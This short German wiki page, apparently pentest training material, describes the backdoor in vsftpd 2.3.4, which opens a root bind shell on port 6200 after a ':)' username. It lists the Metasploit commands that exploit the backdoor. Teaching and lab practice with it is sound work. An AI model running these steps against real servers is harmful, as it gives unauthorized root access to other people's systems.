Metasploit VSFTP 2.3.4

Aus Xinux Wiki
Version vom 25. Juni 2026, 12:20 Uhr von Thomas.will (Diskussion | Beiträge) (→‎Manuell nachspielen)
(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)
Zur Navigation springen Zur Suche springen

Schwachstelle

  • In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt
  • Dabei wurde eine Bind-Shell auf TCP Port 6200 geöffnet, wenn man ":)" als Nutzernamen eingibt

Metasploit benutzen

  • Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren
  • msfconsole
  • search vsftp
  • use exploit/unix/ftp/vsftpd_234_backdoor
  • set RHOSTS IP.des.ftp.servers
  • set RPORT 21
  • set payload cmd/unix/interact
  • exploit
  • Nun sollte man genau wie oben eine sehr minimale Shell haben